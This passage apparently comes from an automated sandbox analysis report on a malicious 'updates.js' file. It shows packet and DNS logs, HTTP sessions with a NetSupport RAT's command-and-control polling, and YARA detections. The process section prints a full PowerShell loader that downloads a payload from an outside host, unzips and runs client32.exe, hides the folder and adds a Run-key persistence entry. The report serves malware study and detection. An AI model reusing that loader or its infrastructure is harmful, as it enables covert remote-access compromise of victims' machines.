                                                                            Jul 17, 2024 15:20:00.266535044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266550064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266566038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266581059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266583920 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266597033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266611099 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266613007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266628027 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266644001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266649961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266675949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266829967 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266844034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266858101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266872883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266881943 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266889095 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266905069 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266906977 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266921043 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266936064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266947031 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266949892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266963959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.266974926 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.266979933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267019033 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267062902 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267163038 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267177105 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267190933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267205954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267220974 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267230988 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267236948 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267255068 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267268896 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267270088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267286062 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267299891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267304897 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267316103 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267335892 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267339945 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267354965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267362118 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267379045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267385006 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267399073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267412901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267433882 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267448902 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267463923 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267477036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267481089 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267496109 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267507076 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267558098 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267621040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267636061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267690897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267692089 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.267712116 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.267765045 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:01.398869038 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:01.609483004 CEST49705443192.168.2.5194.180.191.69
                                                                            Jul 17, 2024 15:20:01.609551907 CEST44349705194.180.191.69192.168.2.5
                                                                            Jul 17, 2024 15:20:01.609632015 CEST49705443192.168.2.5194.180.191.69
                                                                            Jul 17, 2024 15:20:01.691487074 CEST49705443192.168.2.5194.180.191.69
                                                                            Jul 17, 2024 15:20:01.691515923 CEST44349705194.180.191.69192.168.2.5
                                                                            Jul 17, 2024 15:20:01.691658020 CEST44349705194.180.191.69192.168.2.5
                                                                            Jul 17, 2024 15:20:01.753233910 CEST4970680192.168.2.5104.26.0.231
                                                                            Jul 17, 2024 15:20:01.760474920 CEST8049706104.26.0.231192.168.2.5
                                                                            Jul 17, 2024 15:20:01.760560989 CEST4970680192.168.2.5104.26.0.231
                                                                            Jul 17, 2024 15:20:01.769767046 CEST4970680192.168.2.5104.26.0.231
                                                                            Jul 17, 2024 15:20:01.774879932 CEST8049706104.26.0.231192.168.2.5
                                                                            Jul 17, 2024 15:20:02.456142902 CEST8049706104.26.0.231192.168.2.5
                                                                            Jul 17, 2024 15:20:02.456222057 CEST4970680192.168.2.5104.26.0.231
                                                                            Jul 17, 2024 15:21:51.673232079 CEST4970680192.168.2.5104.26.0.231
                                                                            Jul 17, 2024 15:21:51.679176092 CEST8049706104.26.0.231192.168.2.5
                                                                            Jul 17, 2024 15:21:51.679594040 CEST4970680192.168.2.5104.26.0.231

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 17, 2024 15:19:55.846592903 CEST6238253192.168.2.51.1.1.1
                                                                            Jul 17, 2024 15:19:56.015548944 CEST53623821.1.1.1192.168.2.5
                                                                            Jul 17, 2024 15:20:01.710469007 CEST6263053192.168.2.51.1.1.1
                                                                            Jul 17, 2024 15:20:01.726466894 CEST53626301.1.1.1192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jul 17, 2024 15:19:55.846592903 CEST192.168.2.51.1.1.10xf40dStandard query (0)luxurycaborental.comA (IP address)IN (0x0001)false
                                                                            Jul 17, 2024 15:20:01.710469007 CEST192.168.2.51.1.1.10x9f07Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jul 17, 2024 15:19:56.015548944 CEST1.1.1.1192.168.2.50xf40dNo error (0)luxurycaborental.com38.180.60.246A (IP address)IN (0x0001)false
                                                                            Jul 17, 2024 15:20:01.726466894 CEST1.1.1.1192.168.2.50x9f07No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                            Jul 17, 2024 15:20:01.726466894 CEST1.1.1.1192.168.2.50x9f07No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                            Jul 17, 2024 15:20:01.726466894 CEST1.1.1.1192.168.2.50x9f07No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • luxurycaborental.com
                                                                            • 194.180.191.69connection: keep-alivecmd=pollinfo=1ack=1
                                                                            • geo.netsupportsoftware.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.54970438.180.60.24680612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jul 17, 2024 15:19:56.028702021 CEST91OUTGET /cdn-vs/data.php?12105 HTTP/1.1
                                                                            Host: luxurycaborental.com
                                                                            Connection: Keep-Alive
                                                                            Jul 17, 2024 15:19:56.526896000 CEST1236INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Wed, 17 Jul 2024 13:19:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 31 66 35 36 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30 6c 34 6d 6e 54 70 6f 64 32 39 66 58 76 4f 6a 4e 73 57 74 66 67 61 56 31 48 32 44 6c 32 6e 54 72 64 7a 39 39 63 58 31 2b 6e 68 38 4a 47 33 53 6e 4e 51 77 63 54 67 74 63 6f 73 65 74 43 37 5a 72 39 64 49 30 61 55 4c 46 6d 48 37 38 58 74 43 61 54 35 34 2b 73 [TRUNCATED]
                                                                            Data Ascii: 1f56UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0l4mnTpod29fXvOjNsWtfgaV1H2Dl2nTrdz99cX1+nh8JG3SnNQwcTgtcosetC7Zr9dI0aULFmH78XtCaT54+sOcCvZYprOb86BEuCWL3W+jjRBmC8QA22BU9waOy3ikBXoAOgQplwAb/X1ZBODF1B/vSGwMvVQV6uvMIhAX9Zg4NUqNjqK67IdBuuDRcug8neYJboS1VnCBoL5gtglRlddwigPWuW9N6EZ5C/0TcP9Z8TyswDNDwLqD1mwsd8pp84VAzgIpDf4HoajTqKt2FlPnPWTAkonoGeBWbSVaslPf8p00lxCsifjdv7VPCo3nB4La+EOEfmR9q0j5xgONE+eyPlPY8YwukmQuWL8ke4oCl0tYLI4qUag7uHdVk6UjDyy0Oh7ZaPgcHdQ/Xl2bDyBZbdw/RH5ukM7hquMXKBZdfZtUs1SE1vcNfZWkqd5Tb7Jp6wyWZNo6ke2ay0yRa0222TH6a+R4eNV5dJMImKtKhoYrYXIk5EUzXKnMae7bs+TVR6Lc8i92nMpxIOES52ld9b27WZSkPsZEPZlqDVjaAJsKyJXjSl2xPmNLlX3VURU1qQJ7WrAt62jhOspwT7Twv96EOrT8grrMdYj//oQ3O/KVPATGAzJzh04szpEv9Zs8BUZZR/6ITpfmFT/EeLp/lN8R8G4MvuOYaKZ4aGhYyZFjB9GHwtoDvW06dOJZXxwdNIaZyNg62N0iSJg+MIx2tD6gd0/7hgzPIsg7ghJtsCWNSyGSSaNm [TRUNCATED]
                                                                            Jul 17, 2024 15:19:56.527133942 CEST1236INData Raw: 79 4d 46 2f 69 72 39 34 6c 6e 2f 44 44 66 4d 51 50 31 2f 34 76 79 66 79 71 55 47 64 72 77 58 6f 68 53 39 67 55 38 42 69 75 68 72 51 64 51 74 64 44 59 47 76 44 52 5a 30 6f 75 73 35 75 6a 61 76 70 38 56 6e 78 32 79 36 7a 33 79 45 4d 67 75 59 6e 55
                                                                            Data Ascii: yMF/ir94ln/DDfMQP1/4vyfyqUGdrwXohS9gU8BiuhrQdQtdDYGvDRZ0ous5ujavp8Vnx2y6z3yEMguYnU50ZeV96apO19ECuV0fupL7wBy6silkleBRewI+Z8W2cD9HlU/Bj91n7f/Ryv3iluxTw1oqAC3d79TK/V6t3P+klfujW7nv1sr9oFbuz2nl/uJW7m9o5X5sK/f30P2TH1I5kX1XsUYIoXEUq9WY7zSW+qfemF9gR+9
                                                                            Jul 17, 2024 15:19:56.527148008 CEST1236INData Raw: 48 61 7a 65 73 42 6b 32 62 74 77 49 4d 64 39 46 51 75 4b 50 71 79 46 70 79 7a 65 77 64 65 74 57 53 45 78 4d 68 4e 54 55 56 4e 69 31 39 79 44 73 32 37 63 50 54 6d 31 66 43 4b 64 6a 76 34 52 6a 63 63 76 67 64 4e 77 53 75 4a 44 77 42 5a 78 50 57 41
                                                                            Data Ascii: HazesBk2btwIMd9FQuKPqyFpyzewdetWSExMhNTUVNi19yDs27cPTm1fCKdjv4RjccvgdNwSuJDwBZxPWAxX01bA6eRv4FLGRpAd/AKuHIiByqwfoDrre7h2NB5OH9oFv59Ig2snU+HqqQy4fSwO8GI03D+XCYcPH4ZTp07BzfPH4PrFLDh37hxcvXoV7lw+AXmXDsH9q6cg92oW3Ll+EXJuXYL7f16G+7evQe5f16H49nkouX8
                                                                            Jul 17, 2024 15:19:56.528114080 CEST1236INData Raw: 7a 6c 7a 54 54 4b 45 66 47 4d 59 30 32 52 45 63 48 44 59 70 4c 44 68 59 6b 61 4d 6a 6d 4f 74 7a 64 54 50 46 70 55 4e 33 30 67 2f 6a 69 75 77 49 5a 69 65 65 5a 55 64 77 4f 4e 66 76 62 4b 62 41 57 35 33 4e 4f 6e 59 50 44 71 4d 53 65 51 31 6c 42 58
                                                                            Data Ascii: zlzTTKEfGMY02REcHDYpLDhYkaMjmOtzdTPFpUN30g/jiuwIZieeZUdwONfvbKbAW53NOnYPDqMSeQ1lBXbi1Ui/d2eFmPEqPbuHhYVyYw1NsKqN9nt3biY9u08KCw0NVSI0dHaYvC5ZCZ3N9Hu/8847nTsrq/X8T2h4+OzWZJ5Cv7dS3unZI3Te7PD54Q2YHS4/WDZ8CdNvKu/0WjB/3vzZ88Pns1/E7PkREXRhKTrmzyf75qT
                                                                            Jul 17, 2024 15:19:56.528135061 CEST1236INData Raw: 38 6c 75 51 34 4e 55 56 6b 76 79 36 51 71 4a 50 54 30 67 4e 36 67 61 37 67 37 76 43 67 57 6e 64 49 47 57 53 4f 52 77 4d 36 51 6b 5a 49 62 51 76 6e 64 77 58 6a 6b 78 71 44 38 65 6d 76 67 45 6e 51 74 37 69 2b 39 42 54 6f 64 33 67 31 37 6c 76 77 39
                                                                            Data Ascii: 8luQ4NUVkvy6QqJPT0gN6ga7g7vCgWndIGWSORwM6QkZIbQvndwXjkxqD8emvgEnQt7i+9BTod3g17lvw9HQd+Hk7Hdp7/kBnJr7Hpyjexfmvwt/fP4u34senj8ILi/oA1e+6ANnF1nAb4s+ht++GgS7F4yHzAVjaL/pDD8sCoIfv54KXy2cD9FfB8EWSkcvnQpxkdPg4Co/iFsWAtLV4ZCydi5ciBwBl1aMhsur7eDwV45weJk
                                                                            Jul 17, 2024 15:19:56.529253960 CEST1120INData Raw: 41 49 6d 66 52 47 54 74 4f 6e 56 4a 57 6f 2b 6d 35 61 49 41 45 53 6e 35 2b 66 6c 52 67 68 51 6d 54 31 32 79 75 36 4e 53 54 50 2f 48 62 32 71 41 58 30 41 41 6c 51 59 6f 52 44 4a 74 61 56 6f 50 5a 58 6e 33 74 77 4b 6e 42 6a 77 69 73 35 62 75 37 74
                                                                            Data Ascii: AImfRGTtOnVJWo+m5aIAESn5+flRghQmT12yu6NSTP/Hb2qAX0AAlQYoRDJtaVoPZXn3twKnBjwis5bu7tFRfnTs/j8BUwPYb1qAPEGn0KVpPeWlPah8+tSp06k0hDCNSkNCqHx3D4V06t5leuhMkmkzFUKJOUt39+Sl3enXbUbozEekoZzkP6w8fCb7zQifyY6ZAXNZec88xDxWHj4nXCHy2uHzvz2wu2eVfEospfJQXkDnefP
                                                                            Jul 17, 2024 15:19:56.529268026 CEST1236INData Raw: 34 71 6d 44 77 33 75 6f 7a 61 4e 46 6f 62 6f 38 35 41 73 4d 61 62 33 33 39 6b 63 66 66 58 52 7a 78 49 67 52 61 47 6c 70 2b 63 72 6a 6b 34 47 66 6f 49 4f 7a 4f 33 37 68 2f 42 37 47 4f 71 6c 6a 6a 4b 74 4f 47 2b 44 2f 62 38 51 53 74 72 76 6f 34 42
                                                                            Data Ascii: 4qmDw3uozaNFobo85AsMab339kcffXRzxIgRaGlp+crjk4GfoIOzO37h/B7GOqljjKtOG+D/b8QStrvo4B4fHVw6RutaOy3Bf1QFwL7Wmuvr609g73XYsGE4dOjQx/Aq8m9P/C9yeQ/jnNUx1k3nNZ4CMYRkIaXddfE/JqpjjLRVeuvo6AyhNZ+Ixf3W+H8RvOb/1UKihw5Khbr4fic1dzMDlUEvm/8n4VXlP8ZFE2OcW0asm/Y
                                                                            Jul 17, 2024 15:19:56.530339956 CEST1236INData Raw: 57 41 77 65 72 4f 43 2f 44 2f 47 76 52 63 2b 6c 33 7a 5a 77 31 32 32 56 2f 34 4c 53 4b 72 78 35 36 57 77 54 2f 67 33 2b 31 74 35 32 34 76 4c 6f 35 6b 38 35 39 33 4b 75 57 30 59 32 74 5a 4e 66 57 6f 33 48 6f 78 62 78 50 55 47 38 36 39 38 38 45 37
                                                                            Data Ascii: WAwerOC/D/GvRc+l3zZw122V/4LSKrx56WwT/g3+1t524vLo5k8593KuW0Y2tZNfWo3HoxbxPUG86988E7Ud46hC/A/B+8R3dnZOoy1K55Uq+VfhMahp3WSK/UmeBi3yz8DiQGt4dfi3QGc3EX75kvg/FReJ+cUVmJuX93z8M35o7bVjxsd49687NOcXyO20Aja/5BWX4V93bmPq7KF8fZkgfH7+80triH9Rm/P/Ingp/Lv3wUR
                                                                            Jul 17, 2024 15:19:56.530354023 CEST1236INData Raw: 59 52 72 33 4d 31 62 65 44 4d 52 6a 43 62 56 2f 34 39 77 78 6a 50 4d 79 6f 52 6a 4f 6e 72 46 35 65 2f 45 75 78 50 39 63 34 6a 2b 50 31 57 6d 4d 4d 79 78 64 54 4f 76 49 67 79 75 38 75 59 35 55 5a 4e 44 73 47 56 4e 70 37 4f 2f 77 55 66 44 66 4a 50
                                                                            Data Ascii: YRr3M1beDMRjCbV/49wxjPMyoRjOnrF5e/EuxP9c4j+P1WmMMyxdTOvIgyu8uY5UZNDsGVNp7O/wUfDfJP6PGjUKGdgcoATj61WEcvy/TP5LaL4vKi7mvBUSj2XV9a3wT3GA1o2xDgI8se0z4vghFhaXyP2mAflYRvdvXTiJUr8uGO8k4G3F0Tr/yold5Ft1PMY0rcN4LKE4fnzLPP73oSSvx/nfOXcon2MKCgobfIeli6ufwL/
                                                                            Jul 17, 2024 15:19:56.532124996 CEST1236INData Raw: 4b 62 5a 6f 30 44 4d 5a 4e 6d 73 76 33 5a 64 38 77 46 66 4f 2f 78 76 50 77 66 2b 4c 6f 43 33 35 64 78 50 35 34 47 4a 68 50 2b 4a 66 6a 37 2f 44 4e 6f 47 58 49 65 66 2f 50 50 46 66 53 65 2b 77 76 4b 49 43 79 79 6a 2b 6c 68 45 66 74 50 7a 44 37 44
                                                                            Data Ascii: KbZo0DMZNmsv3Zd8wFfO/xvPwf+LoC35dxP54GJhP+Jfj7/DNoGXIef/PPFfSe+wvKICyyj+lhEftPzD7D8vY9r0PpjoqsZ9YO+XtrROqCS9Sq7DdQmlpcQBrQML8h5gWsgHmOiizsd+q+1SWTzFgNQQc8y5S7FE9hBLOfdKsBgg4/EgI8Ka9prAud0zfzhxXsrjjFKXpSvrGf++pKPJ40vTttJ9jYl/48f4Z9yPHTsWmR8o8az
                                                                            Jul 17, 2024 15:19:56.532262087 CEST1236INData Raw: 34 4b 47 6c 7a 6a 54 48 31 47 49 31 6a 30 4d 56 33 4d 65 34 72 78 48 50 4e 62 51 66 4b 43 30 71 70 4c 56 6e 4b 63 31 54 38 68 69 6b 35 4a 2f 35 37 73 2f 45 66 37 4a 51 6d 35 37 4a 70 4a 6e 74 33 66 37 6b 41 2f 37 50 7a 76 2f 4c 78 4c 50 36 67 66
                                                                            Data Ascii: 4KGlzjTH1GI1j0MV3Me4rxHPNbQfKC0qpLVnKc1T8hik5J/57s/Ef7JQm57JpJnt3f7kA/7Pzv/LxLP6gfWIESj09sWlnh/x71lpEtO2ga8JJjqrtMh/NcX2WuK9rp7FhWp+r6lvsLF/KX0N/5tLqveL9SnVV96XBFq//X5gK7ddWdk81lQR57V1LAZVN8xBrIz5Cuv7iXX+uIPiSJpv+2a29wSY4u6ADvhBZ03Ov56e3pD27du


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549705194.180.191.69443892C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jul 17, 2024 15:20:01.691487074 CEST220OUTPOST http://194.180.191.69/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 194.180.191.69Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                            Data Raw:
                                                                            Data Ascii:


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549706104.26.0.23180892C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jul 17, 2024 15:20:01.769767046 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                            Host: geo.netsupportsoftware.com
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Jul 17, 2024 15:20:02.456142902 CEST935INHTTP/1.1 200 OK
                                                                            Date: Wed, 17 Jul 2024 13:20:02 GMT
                                                                            Content-Type: text/html; Charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            CF-Ray: 8a4a86ed8d130ca8-EWR
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: private
                                                                            Set-Cookie: ASPSESSIONIDSQQQBSDC=HMMBFAEDNCIHLGLIPPLELIOC; path=/
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                            Vary: Accept-Encoding
                                                                            cf-apo-via: origin,host
                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U5UH%2B9riilQ0HtpdtlKBK9SwyvkWVx8KTlnvSRFZkNuawlfqA9IVKx0w9IcxW%2FB4cB9dz9i5D6HRjDPa%2Bxl0Vzhk5ZY0gj7hVweFUXYI4H1Vb59OHhY7NPsq5mqnppDVIWI7wv5ptnerSQ%2F3"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1040.7357,-74.17240


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:19:48
                                                                            Start date:17/07/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
                                                                            Imagebase:0x7ff687db0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:09:19:53
                                                                            Start date:17/07/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C67C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C686000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C37F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C7AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.2273711249.0000014E8C65D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:09:19:53
                                                                            Start date:17/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
